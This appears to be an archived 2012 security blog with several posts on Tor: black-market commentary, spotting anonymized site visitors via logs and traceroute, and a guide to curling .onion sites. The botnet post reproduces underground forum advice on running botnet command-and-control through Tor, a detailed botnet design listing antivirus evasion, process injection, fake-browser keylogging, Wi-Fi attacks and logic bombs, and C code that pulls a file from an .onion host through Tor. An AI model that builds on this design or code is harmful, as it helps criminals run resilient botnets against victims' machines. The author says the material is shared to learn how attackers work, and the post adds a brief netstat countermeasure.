08/28/12

Black Market in Tor Growing

gAtO been down sIcK so I had to slow down so I’ve been reading underground looking around and the .onion network is beginning to take shape as more users explore it. Let’s just say it’s growing. In the Black Market things are looking up per say, more newbies and more scams with money mules, shipping mules, bot’s rentals and creation and trade. Here are two different crime recruitment points one the physical/ one code / and they are taking advantage of the economics of the situation.

People are losing their homes and eviction is coming “well I can do this for these guys online and I can make a little money and pay a few bills buy some food”. Grooming these new cyber shipping mules is a full time job, but they select and groom some for more and more /—then hit’s them with money mules transactions and they’re hooked. Greed / Pay the rent/ Now these guy know that as the money mule get’s more and more orders right the amount will go up and when they will bail with the criminals money is anyones guess, but by this time they have funneled so much money or goods thru these mules that they are throw away at the end of the life cycle of use. You also have the new code warriors watching and trading in botware working in Tor. Why because it works -/ and other have seen the .onion network as a new area were if they keep quite nobody can find them. If you keep quite nobody will know what your doing and that’s why Tor is working for the bad guys – Why can’t it work for the good guy’s when are we going to start using the best technology for the best job and leave all this other politics alone.

Cyber crime is working in the .onion but when will the law catch up, never I guess 2 many lost opportunities when they treat everyone like shit, just like the ugNazi CC bust- do they have a clue how many other CC sites are out there working in Tor and/or the surface web… . Silk road is all the rage while Black Market Reload sells explosives and drugs but come on the school boys in Cornell and other places are putting their finger into Tor to defeat Tor-attack the Tor Network Yeah – Yeah- “What If- What If -does not work in Tor students”, as they go for Silk Road the hundred of other places were real commercial cyber crooks get away with everything they can is working hard for the money boy’s and girls…. One service takes stolen credit cards to buy goods and directly ship products to the Ebay customer who purchase it and they pay them clean money while their new iPad was purchased with a stolen CC. It’s just these newbies in Tor think they are hip and cool in the surface but in the Tor network the good old boy’s that were there in the beginning are watching with a grim silly smile, knowing but not telling… gATO oUT 

07/19/12

Fingerprint Tor or Government Anonymized Network

How To  Fingerprint Anonymized Network visiting your website

gAtO hAs - been learning about the Tor-.onion network and one thing I wanted to understand was how China, Iran and Syria block the Onion-Router (OR). / Fingerprint Profile – I have read in the Tor wiki about the Tor signal simulating a Skypes fingerprint to hide in the clutter of the web. So how do I figure this out? Ok with WireShark I can capture the packets and check out the signature and fingerprint of a Tor anoymized network. This is one way.

Another way – just check out your website statistics and look for anyone that visited your site that does not have a country code.  From  observation of my site uscyberlabs.com I have found a pattern lately most “no country flag” indicates a Tor OR or a private – Anonymized Network. Not all of them are Tor so some of the others are the most interesting because they are anonymized but not Tor, I2P maybe, government networks -mAyBe -sI -nO gAtO is a gAtO let’s check this out

I have a few SEO packages on my site to check out the back-end statistics of the site. This give you information about your web visitor like the referal of the site that you came from, The OS, the platform and the Country were you came from, your geo-Location. One of the things that Tor does for you is prevent people from knowing your IP / geo-location. So guess what??? people have been visiting my site using not just Tor-networks – c00l b3ans, but so what else can I find out about these other  non-Tor relay— so I started digging around and this is what I found about some of these exit-relays… gAtO wArNiNg - I have to hold back some information about governments anonymized networks due to privacy and vulnerabilities possibilities.

A fingerprint of NO COUNTRY FLAGS – on my logs show’s Tor Exit-Relay type anonymized network according to the Visitor statistics: Figure 1(below) a snapshot of my log from ExtremeTracking.com –//  You noticed the ip or names of referred site with no country flags. Example: 217.79.231.13 for-exit0-readme.dfi.se – tor21.anonymizer.ccc.de - and a few more —

 

I decide to -Trust but Verifythe security Dude’s secret motto -mEoW

I went to the command line:

-curl tor21.anonymizer.ccc.de   – it came back with information that this exit-relay come’s from the Tor-Project personal relays- and it’s private-relay because I checked it against and guess what it’s hosted by there dear friends Chaos Computer Club – that brings back the “way-back machine” to the old day of real hacking but these are the guy’s from Germany and they are good friends of the Tor project, so this is a trusted Tor exit relay for the Tor project..// interesting // they were reading my “recon the deep web article

curl tor21.anonymizer.ccc.de

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-<ol>

<li><a href=”https://www.torproject.org/overview.html“>Tor Overview</a></li>

<li><a href=”https://www.torproject.org/faq-abuse.html“>Tor Abuse FAQ</a></li>

<li><a href=”https://www.torproject.org/eff/tor-legal-faq.html“>Tor Legal FAQ</a></li>

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-</ol>

IP – 31.172.30.4 – All (Onion Router) OR from Chaos seem to be – OS window 7

27 Jun, Wed, 14:02:33 tor21.anonymizer.ccc.de uscyberlabs.com/blog/2012/02/05/recon-deep-web/

 

 I found out all 3 Tor OR-relays had this signature – No Flag Fingerprint = TOR/i2p = secure traffic/anoymized  traffic-

***  -Trust but Verify –/ What caught my attention in the log was  141.101.70.66it is owned by nLayer Communication    — Who is nLayer they provides Internet connectivity solutions. The company provides IP transit, data transportation, and managed networking services to governments agencies. CIA, FBI, NSA any alphabet soup agency that you want from the .gov folks.

How did we get from 141.101.70.66 to nLayer: a traceroute- command

[2] traceroute to 141.101.70.66 (141.101.70.66), 64 hops max, 52 byte packets

1  10.2.120.1 (10.2.120.1)  11.513 ms  10.851 ms  8.521 ms

2  wwcksysc01-gex0103000.ri.ri.cox.net (68.9.8.13)  10.120 ms  11.272 ms  7.912 ms

3  ip98-190-33-21.ri.ri.cox.net (98.190.33.21)  11.896 ms  9.496 ms  12.044 ms

4  provdsrj01-ae3.0.rd.ri.cox.net (98.190.33.20)  10.429 ms  13.194 ms  11.063 ms

5  nyrkbprj01-ae2.0.rd.ny.cox.net (68.1.1.173)  18.038 ms  15.177 ms  14.140 ms

6  ae0-50g.cr1.nyc3.us.nlayer.net (69.31.95.193)  16.279 ms  17.128 ms  17.859 ms

7  xe-7-3-0.cr1.lhr1.uk.nlayer.net (69.22.142.133)  87.076 ms  83.085 ms  82.096 ms

8  ae1-70g.ar1.lhr1.uk.nlayer.net (69.22.139.63)  83.856 ms  84.420 ms  85.732 ms

as13335.xe-4-0-6.ar1.lhr1.uk.nlayer.net (63.141.223.42)  82.774 ms  102.143 ms  82.082 ms

10  141.101.70.66 (141.101.70.66)  83.317 ms  83.772 ms  82.424 ms

And of course this all goes thru some dummy corporate stuff to fool anyone // if you dig a little // I guess Global Telecom & Technology, Inc. (“GTT”), (OTCBB: GTLT.OB - // – have you seen their stock almost double since the US government stepped up it’s cyber position- good cyber investment I guess–// ), a global network operator providing managed data services to large enterprise, government and carrier customers in over 80 countries worldwide, today announced the acquisition of privately-held, Chicago-based nLayer Communications, Inc. -government and carrier customers/ government and carrier customers / government and carrier customers…//

…—…

So gaTo what does all this mean / a simple website statistics can help you see your anonymized visitors – No Flag Fingerprint = TOR/i2p = secure traffic/anoymized  traffic- / or it could be from a government site -knock, knock, knocking at your website door- also or business spying your site, your information. gAtO think it’s a waste of time because gAtO is wasted most of the time when he writes this stuff- RI MMP program, life sucks big time.

Besides the Tor or I2P  traffic// the pattern in the fingerprint that show no country flag: — secure traffic/anoymized — this is open source software that governments have modified for their own skunk work… Governments have taken the 3rd level Tor-Onion routing (code) and has their own similar network, but under the hood is the same core code – “ no Flag” show’s root code flaw, So any webmaster that has a website can find Tor like Exit-Relays or govs, watching you watching them -

: As long as the visitor is visiting from inside the matrix of a anoymized network they must use and Exit-Node-no country flag - GOTCHA—gATO ouT

by the way Chaos Computer Club 31.172.30.4 nice Tor- exit-node

 

gAtOmAlO lAb nOtEs –=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

traceroute 31.172.30.4

traceroute to 31.172.30.4 (31.172.30.4), 64 hops max, 52 byte packets

1  10.2.120.1 (10.2.120.1)  46.027 ms  12.175 ms  9.976 ms

2  wwcksysc01-gex0103000.ri.ri.cox.net (68.9.8.13)  15.444 ms  11.472 ms  10.996 ms

3  ip98-190-33-21.ri.ri.cox.net (98.190.33.21)  10.043 ms  9.272 ms  10.127 ms

4  provdsrj01-ae3.0.rd.ri.cox.net (98.190.33.20)  9.597 ms  9.633 ms  16.782 ms

5  68.1.4.133 (68.1.4.133)  21.272 ms  22.538 ms  21.357 ms

6  ae-6.r21.asbnva02.us.bb.gin.ntt.net (129.250.3.113)  42.541 ms  50.629 ms  61.680 ms

7  ae-2.r23.amstnl02.nl.bb.gin.ntt.net (129.250.2.145)  133.403 ms  162.975 ms  137.493 ms

8  ae-2.r02.amstnl02.nl.bb.gin.ntt.net (129.250.2.159)  136.255 ms  128.778 ms  133.927 ms

9  xe-4-1.r02.dsdfge01.de.bb.gin.ntt.net (129.250.2.65)  142.335 ms  142.499 ms  141.396 ms

10  xe-3-4.r00.dsdfge02.de.bb.gin.ntt.net (129.250.5.173)  133.058 ms  128.793 ms *

11  213.198.77.122 (213.198.77.122)  132.148 ms  136.187 ms  132.329 ms

12  tor21.anonymizer.ccc.de (31.172.30.4)  123.563 ms  130.866 ms  121.906 ms —

 

traceroute 199.48.147.35

traceroute to 199.48.147.35 (199.48.147.35), 64 hops max, 52 byte packets

1  10.2.120.1 (10.2.120.1)  1842.973 ms  9.712 ms  10.324 ms

2  wwcksysc01-gex0103000.ri.ri.cox.net (68.9.8.13)  9.961 ms  10.751 ms  10.437 ms

3  ip98-190-33-21.ri.ri.cox.net (98.190.33.21)  12.393 ms  10.226 ms  9.773 ms

4  provdsrj01-ae3.0.rd.ri.cox.net (98.190.33.20)  19.731 ms  9.270 ms  18.419 ms

5  nyrkbprj01-ae2.0.rd.ny.cox.net (68.1.1.173)  15.479 ms  15.045 ms  16.067 ms

6  ae0-50g.cr1.nyc3.us.nlayer.net (69.31.95.193)  15.114 ms  22.195 ms  16.909 ms

7  ae2-70g.cr1.ewr1.us.nlayer.net (69.31.95.145)  16.976 ms  28.552 ms  15.767 ms

8  xe-3-1-0.cr1.sjc1.us.nlayer.net (69.22.142.137)  90.901 ms  104.251 ms  90.386 ms

9  ae1-40g.ar2.sjc1.us.nlayer.net (69.22.143.118)  97.274 ms  91.747 ms  92.165 ms

10  as18779.xe-4-0-4.ar2.sjc1.us.nlayer.net (69.22.153.94)  91.277 ms  104.404 ms  100.544 ms

11  gw-ao.sjc01.appliedops.net (173.245.68.18)  98.566 ms  92.947 ms  91.660 ms

12  tor-exit-router35-readme.formlessnetworking.net (199.48.147.35)  93.154 ms  92.201 ms  92.769 ms

 

 traceroute 217.79.231.13

traceroute to 217.79.231.13 (217.79.231.13), 64 hops max, 52 byte packets

1  10.2.120.1 (10.2.120.1)  19.522 ms  35.384 ms  9.940 ms

2  wwcksysc01-gex0103000.ri.ri.cox.net (68.9.8.13)  12.016 ms  11.162 ms  9.829 ms

3  ip98-190-33-21.ri.ri.cox.net (98.190.33.21)  13.815 ms  8.970 ms  9.637 ms

4  provdsrj01-ae3.0.rd.ri.cox.net (98.190.33.20)  11.118 ms  11.123 ms  9.964 ms

5  68.1.4.133 (68.1.4.133)  20.776 ms  20.920 ms  61.446 ms

6  ttc.tenge11-1.br02.ldn01.pccwbtn.net (63.218.54.38)  95.216 ms  107.984 ms  94.783 ms

7  217.150.59.202 (217.150.59.202)  149.863 ms  149.865 ms  149.539 ms

8  vl554-gvrn-sr1.msk1.net.lancronix.ru (217.79.224.67)  158.159 ms  165.395 ms  157.553 ms

217.79.231.13 (217.79.231.13)  157.467 ms  157.215 ms  166.376 ms

 

07/17/12

Are Criminals Using Tor-onion- Controlled Botnet

gAtO aSkEd – are criminals using Tor-.onion network to run botnets?  I started searching in the deep dark web and found some interesting discussion threads. I copied them down from different places in onion land. But a simple search in “the abyss-search engines”— http://nstmo7lvh4l32epo.onion — dark web search engine can let you see a few places were Tor-controlled botnets are being sold, discussed and a place were you can ask questions and get back some real answers since they’re in the .onion.

So this may shed some light on this what hackers and criminals are talking about, and see how the bad guy’s are doing it- I just want to learn. -gAtO oUt 

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

  • Is there any good reason for a botnet not to contact an onionland server for C&C? It seems like that would make it harder to shut down, since you can’t find the server. What reason am I missing for this not being done more often?
  • This is actually very simple to implement. I’ve been working on a project that does this for a few months that’s pretty much complete.
  • My bot uses a hidden service to pull down a custom torrc, this file contains information on private directory servers which it then uses to connect to a private tor network.
  • The bot can choose weather to stay on the public tor network or connect to a privet network depending on what the C&C tells it to do.
  • If it connects to the private network it does a check to see if the client machine is hosted behind a NAT, if it’s not it becomes a relay and exit node.
  • I’m a newbie coder and wrote this in C so it is very easy to do. I’m just in the process of porting the whole thing over to linux atm.
  • The most obvious way to do this would be to install Tor on compromised systems and have the bots set up to issue their commands through Tor.
  • Another way would be to just run the C&C server on Tor and have the bots use a tor to web proxy, either a public one or you could set up your own on compromised servers. The downside with this approach is that it would be a lot easier to block and shut down.
  • A third option is to run your own Tor network and have the clients with higher bandwidth and up-time act as relays. This would seem like the most difficult approach and would require you to run your own root server which would lessen the resilience of the botnet.
  • I prefer the idea of using the normal Tor network with bots acting as clients only. This option seems like it would be pretty easy to set up and would insulate you from a lot of the risks normally associated with running a botnet. I’m not sure if this would require much modification to the Tor code.
  • Assuming the network was only to comprise of Windows machines you could use the Tor Expert Package. If Tor could be installed from the command line and have it hide from the system as much as possible, such as not creating Start Menu entries and Desktop icons, then this could have some potential without really much work at all. Does anyone know if this is possible, can Tor be installed from the command line with flags that set the options that would need disabling and without popping up an install wizard? If this is possible then Tor wouldn’t even need modifying at all.
  • As far as I can see, assuming Tor is not compromised and you are careful about how you do it, this seems like the best way to run a resilient botnet. If the C&C server code is secure and you keep the attack surface to a minimum this sort of network would resist a lot of scrutiny before it could effectively be mitigated.

gAtOmAlO LaB nOtEs

Working on a similar project. Dark Umbrella fast flux/domain flux hybrid approach

(In development about 3-5 months left)

bot coded in assembly no dependencies

Each build has maximum of 10k bots to ovoid widespread av detection.

Basic bot uses socks5.

built in ssh client

(fast-flux)

Bot is built with 30k pre generated 256 bit AES keys.

1 256 bit AES key for logs

1 256 bit AES key ssh

1 256 bit AES key socks 5

hwid it selects a pre-generated key 256 bit AES key.

Bot writes encrypted data into common file using stenography

process injection

Download/Upload Socks5

Bot sends data to a collector bot via socks5 through ipv6 which makes NAT traversal a trivial matter.

Using ipv6 in ipv4 tunnel.

Collector bot assembly

tor and i2p Plug-ins C++

Assuming 10k bots

Bots will be assigned into small groups of 25. And are assigned 400 collectors bots which is evenly 200 tor and 200 i2p.

Collector packages the encrypted logs and imports them into a .zip or rar archive and uses sftp to upload through tor to a bullet proof server Note the Ukraine is best know

Russia is no good.

(Domain-flux .onion panel can be easily moved)

Using a Ubuntu Server on bullet proof server.

Using tor and Privoxy. Panel can be routed through multiple cracked computers using proxychains and ssh.

Server uses a simple .onion panel with php5 and apache2 and mysql.

You might ask what happens if bullet proof server is down. The collector bots can be loaded with 5 .onion panels. If panel fails for 24 hours its removed from all Collectors and bot will go to the next one and so forth.

A python Daemon runs and unzip the data and Imports it into a mysql database were it remains encrypted.

The bot master uses my Dark Umbrella.net panel to connect to the remote Bullet Proof server through a vpn and then through tor using ssh to run remote commands on server and

sftp to upload and download. Running tor through a log less vpn through with a trusted exit node on the tor network. .net panel connects to mysql database database is decrypted

on .NET panel (Note must real Bullet Proof hosting is not trust worthy this solves that issue) and imported into a local .mdb database. Then later the bot Master should encrypt

database folder on true crypt. Commands are sent to bots individually rather then corporately like most bot nets. This allows for greater anonymity It will be possible to send

commands corporately but strongly discouraged. Collector bots download and upload large files through i2p.

1.Connects remotely to rpc daemon through backconect and simplifying metasploit (Working)

2.Social network cracker. (in development)

3.Statics. (Working)

4.Anonymity status. (Working)

5.Decrypt-er. Decryption codes in highly obfuscated.net limiting each build to 10k bots. (Working)

6.Daemon status (Working)

7.logs (Working)

8.Metasploit connects via rpc. (working)

9. GPS tracked Assets by Google maps and using net-book with a high powered external usb wifi attenas.

Starts an automatic attack if wep if wpa2 grabes handshake. If open starts basic arp spoofing attack. Common browser exploits. (in development)

10.Teensy spread. (in development)

11.vnc back connect. (working)

12. Advanced Persistent threat. Fake Firefox, Fake Internet Explorer, Fake Chrome. Fake Windows Security Essentials. (in development allows for excellent custom Bot-master defined keyloging)

13. Dark search bot index file is downloaded allowing easy searching of hard drives. (Working)

14. voip logic bomb. bot computer is sent via a voip call file once played through voip the microphone hears mp3 file and the dormant payload is activated in bot that is the logic bomb. (in development)

bot Plug-ins developed later

Each Panel is hwid

1 unique build per Copy embedded into panel.

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

function tor_new_identity($tor_ip='127.0.0.1', $control_port='9051', $auth_code=''){
$fp = fsockopen($tor_ip, $control_port, $errno, $errstr, 30);
if (!$fp) return false; //can't connect to the control port

fputs($fp, “AUTHENTICATE $auth_code\r\n”);
$response = fread($fp, 1024);
list($code, $text) = explode(‘ ‘, $response, 2);
if ($code != ’250′) return false; //authentication failed

//send the request to for new identity
fputs($fp, “signal NEWNYM\r\n”);
$response = fread($fp, 1024);
list($code, $text) = explode(‘ ‘, $response, 2);
if ($code != ’250′) return false; //signal failed

fclose($fp);
return true;
}

/**
* Load the TOR’s “magic cookie” from a file and encode it in hexadecimal.
**/
function tor_get_cookie($filename){
$cookie = file_get_contents($filename);
//convert the cookie to hexadecimal
$hex = ”;
for ($i=0;$i<strlen($cookie);$i++){
$h = dechex(ord($cookie[$i]));
$hex .= str_pad($h, 2, ’0′, STR_PAD_LEFT);
}
return strtoupper($hex);
}

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

#define CURL_STATICLIB
#include <stdio.h>
#include <stdlib.h>
#include <curl/curl.h>
#include <curl/types.h>
#include <curl/easy.h>
#include <string>
#include <ctime>

size_t write_data(void *ptr, size_t size, size_t nmemb, FILE *stream) {
size_t written;
written = fwrite(ptr, size, nmemb, stream);
return written;
}

void startTor() {
system(“C:\\tor.exe”);
Sleep(5000);
return;
}

int main(void) {

//    startTor();

CURL *curl;
FILE *fp;
CURLcode res;
char *url = “http://46lm7zhgildryehk.onion/files/msg.sig”;
char outfilename[FILENAME_MAX] = “C:\\msg.sig”;
curl_global_init(CURL_GLOBAL_DEFAULT);
curl = curl_easy_init();
if (curl) {
fp = fopen(outfilename,”wb”);
curl_easy_setopt(curl, CURLOPT_PROXYTYPE, CURLPROXY_SOCKS4A);
curl_easy_setopt(curl, CURLOPT_PROXY, “127.0.0.1:9050″);
curl_easy_setopt(curl, CURLOPT_URL, url);
curl_easy_setopt(curl, CURLOPT_WRITEFUNCTION, write_data);
curl_easy_setopt(curl, CURLOPT_WRITEDATA, fp);
res = curl_easy_perform(curl);
curl_easy_cleanup(curl);
fclose(fp);

}
return 0;
}

 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Now first gAtO will give you the counter-measures you see if they run Tor then a simple “netstat -ar |grep LISTEN” at any unix terminal will show you what is open and who and what is LISTENing on what ports:../

Now when I only only using Tor to browse: I run —>  :MacOS gatomalo$ netstat -av |grep LISTEN 

Tor Browser – tcp4       0      0  *.9030                 *.*                    LISTEN

after I run Tor manually to use system commands I can see my ticket out of the :MacOS gatomalo$ netstat -av |grep LISTEN

Tor tcp4       0      0  localhost.9050    *.*    LISTEN

Tor Bundle tcp4       0      0  *.9030                 *.*    LISTEN

So turn off 9050 port in your firewall.

07/12/12

OSx -Tor Web Crawler Project

OSx Curl .onion sites -how 2 guide- Tor Web Crawler Project

gATO hAs - been looking into mapping the Tor -.onion network crawling it from aA to zZ , from 1-7 all 16 digits. I use OSx for most of my work and I wanted to curl an .onion site and check it out. As I dug around I found that if I just check my Vidalia.app it will show me were everything is located. Then the fun begins

find your /TorBrowser_en-US-6.app then click and look at the file Info  then go to: TorBrowser_en-US-6.app/Contents/MacOS/

cd - TorBrowser_en-US-6.app/Contents/MacOS/

once here :

- this will show you the files

ls -fGo 

total 5976

drwxr-xr-x  7 richardamores      238 Jun  8 07:11 .

drwxr-xr-x  7 richardamores      238 Feb 19 06:54 ..

drwxr-xr-x  3 richardamores      102 Feb 19 06:54 Firefox.app

-rwxr-xr-x  1 richardamores  3045488 Feb 19 06:54 tor

-rwxr-xr-x  1 richardamores     1362 Feb 19 06:54 TorBrowserBundle

drwxr-xr-x  4 richardamores      136 Feb 19 06:54 Vidalia.app

-rw-r–r–  1 richardamores     6435 Jun  8 07:11 VidaliaLog-06.08.2012.txt

Now I fire up the tor application ./tor

Next open up another Terminal box and check to see if Tor port is open and LISTENing on port 9050

netstat -ant | grep 9050 # verify Tor is running

Once you can see port 9050 LISTEN then your ready to use curl—

curl -ivr –socks4a 127.0.0.1:9050 http://utup22qsb6ebeejs.onion/

curl -ivr –socks4a 127.0.0.1:9050 http://nwycvryrozllb42g.onion  

curl -ivr –socks4a 127.0.0.1:9050  http://2qd7fja6e772o7yc.onion/

curl -ivr –socks4a 127.0.0.1:9050 http://5onwnspjvuk7cwvk.onion/

curl -ivr –socks4a 127.0.0.1:9050 http://6sgjmi53igmg7fm7.onion/

curl -ivr –socks4a 127.0.0.1:9050 http://6vmgggba6rksjyim.onion/

Here are a few site that you can check out:../ curl is just one of those tools that keeps on giving and of course if I can get one APP to work thru Tor on OSx, then I can get other apps to use Tor as a proxy for all my line command –time to have some fun- gATO oUt

Lab -Notes

  1. sudo apt-get install tor
  2. sudo /etc/init.d/tor start
  3. netstat -ant | grep 9050 # verify Tor is running

here is a good crawler  to play with

<?php

$ch = curl_init(‘http://google.com’);

curl_setopt($ch, CURLOPT_HEADER, 1);

curl_setopt($ch, CURLOPT_HTTPPROXYTUNNEL, 1);

curl_setopt($ch, CURLOPT_PROXY, ‘https://127.0.01:9050/’);

curl_exec($ch);

curl_close($ch);

<?php

$ch = curl_init(‘http://google.com’);

curl_setopt($ch, CURLOPT_HEADER, 1);

curl_setopt($ch, CURLOPT_HTTPPROXYTUNNEL, 1);

// Socks5

curl_setopt($ch, CURLOPT_PROXY, “localhost:9050″);

curl_setopt($ch, CURLOPT_PROXYTYPE, CURLPROXY_SOCKS5);

curl_exec($ch);

curl_close($ch);

Tor Web Crawler

http://stackoverflow.com/questions/9237477/tor-web-crawler

did not work – netstat shows it on socks4 not socks5

curl -s –socks5-local 127.0.0.1:9050 –user-agent “Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US;rv:1.9.2.3) \ Gecko/20100401 Firefox/3.6.3″ -I http://utup22qsb6ebeejs.onion/

turn on ToR

Run  /Users/gatomalo/Downloads/TorBrowser_en-US-6.app/Contents/MacOS/tor

cd /Users/gatomalo/Downloads/TorBrowser_en-US-6.app/Contents/MacOS

./tor

now check for 9050 running proxy

netstat -ant | grep 9050

Now run your network commands thru socks port 9050

./Users/gatomalo/Downloads/TorBrowser_en-US-6.app/Contents/MacOS/tor

ls -fGo

total 5976

drwxr-xr-x  7 richardamores      238 Jun  8 07:11 .

drwxr-xr-x  7 richardamores      238 Feb 19 06:54 ..

drwxr-xr-x  3 richardamores      102 Feb 19 06:54 Firefox.app

-rwxr-xr-x  1 richardamores  3045488 Feb 19 06:54 tor

-rwxr-xr-x  1 richardamores     1362 Feb 19 06:54 TorBrowserBundle

drwxr-xr-x  4 richardamores      136 Feb 19 06:54 Vidalia.app

-rw-r–r–  1 richardamores     6435 Jun  8 07:11 VidaliaLog-06.08.2012.txt

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

curl -S –socks5-hostname 127.0.0.1:9050 -I http://utup22qsb6ebeejs.onion/

HTTP/1.1 200 OK

Date: Thu, 12 Jul 2012 17:49:49 GMT

Server: Apache/2.2.22 (Ubuntu)

X-Powered-By: PHP/5.3.10-1ubuntu3.2

Set-Cookie: fpsess_fp-a350e65d=8hg0upuuhcpuf4pgvg45l9c2b2; path=/

Expires: Thu, 19 Nov 1981 08:52:00 GMT

Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0

Pragma: no-cache

Vary: Accept-Encoding

Transfer-Encoding: chunked

Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC “-//W3C//DTD XHTML 1.0 Strict//EN” “http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd”>

<html xmlns=”http://www.w3.org/1999/xhtml”>

<head>

<title>My Hidden Blog</title>

<meta http-equiv=”Content-Type” content=”text/html; charset=utf-8″ />

<!– start of jsUtils –>

<script type=”text/javascript” src=”http://utup22qsb6ebeejs.onion/fp-plugins/jquery/res/jquery-1.4.2.min.js”></script>

<script type=”text/javascript” src=”http://utup22qsb6ebeejs.onion/fp-plugins/jquery/res/jquery-ui-1.8.2.custom.min.js”></script>

<!– end of jsUtils –>

<!– FP STD HEADER –>

<meta name=”generator” content=”FlatPress fp-0.1010.1″ />

<link rel=”alternate” type=”application/rss+xml” title=”Get RSS 2.0 Feed” href=”http://utup22qsb6ebeejs.onion/?x=feed:rss2″ />

<link rel=”alternate” type=”application/atom+xml” title=”Get Atom 1.0 Feed” href=”http://utup22qsb6ebeejs.onion/?x=feed:atom” />

<!– EOF FP STD HEADER –>

<!– FP STD STYLESHEET –>

<link media=”screen,projection,handheld” href=”http://utup22qsb6ebeejs.onion/fp-interface/themes/leggero/leggero/res/style.css” type=”text/css” rel=”stylesheet” /><link media=”print” href=”http://utup22qsb6ebeejs.onion/fp-interface/themes/leggero/leggero/res/print.css” type=”text/css” rel=”stylesheet” />

<!– FP STD STYLESHEET –>

Some other curl switches =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

–connect-timeout <seconds>

Maximum time in seconds that you allow the connection to the server to take.  This only limits the con-

nection  phase,  once  curl  has  connected  this  option is of no more use. See also the -m/–max-time

option.

 

If this option is used several times, the last one will be used.

 

-D/–dump-header <file>

Write the protocol headers to the specified file.

 

This  option  is handy to use when you want to store the headers that a HTTP site sends to you. Cookies

from the headers could then be read in a second curl invocation by using the  -b/–cookie  option!  The

-c/–cookie-jar option is however a better way to store cookies.

 

When  used  in  FTP,  the  FTP  server response lines are considered being “headers” and thus are saved

there.

 

If this option is used several times, the last one will be used.

 

 

-f/–fail

(HTTP)  Fail silently (no output at all) on server errors. This is mostly done to better enable scripts

etc to better deal with failed attempts. In normal cases when a HTTP server fails to  deliver  a  docu-

ment,  it returns an HTML document stating so (which often also describes why and more). This flag will

prevent curl from outputting that and return error 22.

 

This method is not fail-safe and there are occasions where  non-successful  response  codes  will  slip

through, especially when authentication is involved (response codes 401 and 407).

 

 

 

–ssl

(FTP,  POP3,  IMAP, SMTP) Try to use SSL/TLS for the connection.  Reverts to a non-secure connection if

the server doesn’t support SSL/TLS.  See also –ftp-ssl-control and –ssl-reqd for different levels  of

encryption required. (Added in 7.20.0)

 

This  option  was  formerly known as –ftp-ssl (Added in 7.11.0) and that can still be used but will be

removed in a future version.

 

-H/–header <header>

(HTTP)  Extra  header to use when getting a web page. You may specify any number of extra headers. Note

that if you should add a custom header that has the same name as one of the internal  ones  curl  would

use,  your externally set header will be used instead of the internal one. This allows you to make even

trickier stuff than curl would normally do. You should not replace internally set headers without know-

ing perfectly well what you’re doing. Remove an internal header by giving a replacement without content

on the right side of the colon, as in: -H “Host:”.

 

curl will make sure that each header you add/replace is sent with the proper  end-of-line  marker,  you

should thus not add that as a part of the header content: do not add newlines or carriage returns, they

will only mess things up for you.

 

See also the -A/–user-agent and -e/–referer options.

 

This option can be used multiple times to add/replace/remove multiple headers.

 

-o/–output <file>

Write output to <file> instead of stdout. If you are using {} or [] to fetch  multiple  documents,  you

can  use ‘#’ followed by a number in the <file> specifier. That variable will be replaced with the cur-

rent string for the URL being fetched. Like in:

 

curl http://{one,two}.site.com -o “file_#1.txt”

 

or use several variables like:

 

curl http://{site,host}.host[1-5].com -o “#1_#2″

 

You may use this option as many times as the number of URLs you have.

 

See also the –create-dirs option to create the local directories dynamically. Specifying the output as

‘-’ (a single dash) will force the output to be done to stdout.

 

-r/–range <range>

(HTTP/FTP/SFTP/FILE) Retrieve a byte range (i.e a partial document) from a HTTP/1.1, FTP or SFTP server

or a local FILE. Ranges can be specified in a number of ways.

 

0-499     specifies the first 500 bytes

 

500-999   specifies the second 500 bytes

 

-500      specifies the last 500 bytes

9500-     specifies the bytes from offset 9500 and forward

 

0-0,-1    specifies the first and last byte only(*)(H)

 

500-700,600-799

specifies 300 bytes from offset 500(H)

 

100-199,500-599

specifies two separate 100-byte ranges(*)(H)

 

 

 -v/–verbose

Makes  the fetching more verbose/talkative. Mostly useful for debugging. A line starting with ‘>’ means

“header data” sent by curl, ‘<’ means “header data” received by curl that is hidden  in  normal  cases,

and a line starting with ‘*’ means additional info provided by curl.

 

Note  that if you only want HTTP headers in the output, -i/–include might be the option you’re looking

for.

 

If you think this option still doesn’t give you enough details, consider using –trace or –trace-ascii

instead.

 

This option overrides previous uses of –trace-ascii or –trace.

 

Use -s/–silent to make curl quiet.

07/5/12

The Deep Dark Web -Book

gAtO sAy -mEoW you all- we have a new book coming out soon “The Deep Dark Web” and just wanted to write this as the foreword for the book, I thought it was interesting …//looking for peer review of book…write us

This book is to inform you about “The Deep Dark Web”. We hear that it’s a bad place full of crooks and hackers, but it is more a place were you have total anonymity as an online-user and yes there are ugly places in the dark web but it’s a small part of it. What it really is all about it’s freedom of expression, freedom of speech worldwide, supported by “us/we” the users of the network. It’s not controlled by any government, but blocked by a few like Syria, Iran, Ethiopia, China to name a few governments that want to deny their own people free access to information, to speak freely about their grievances and unite to tear down there walls of oppression.

Pierluigi and I (gAtO) share a passion for cyber security we write different blogs Pierluigi has http://securityaffairs.co/wordpress/ and my site is uscyberlabs.com . We also write at other blogs and print media. We did’nt know it at the time but, we were writing cyber history as the 2011- 2012 cyber explosion took off we were at ground zero writing about Stuxnet, HBGrays, the LulzPirates, Anonymous but the Arab Spring was an awaking :

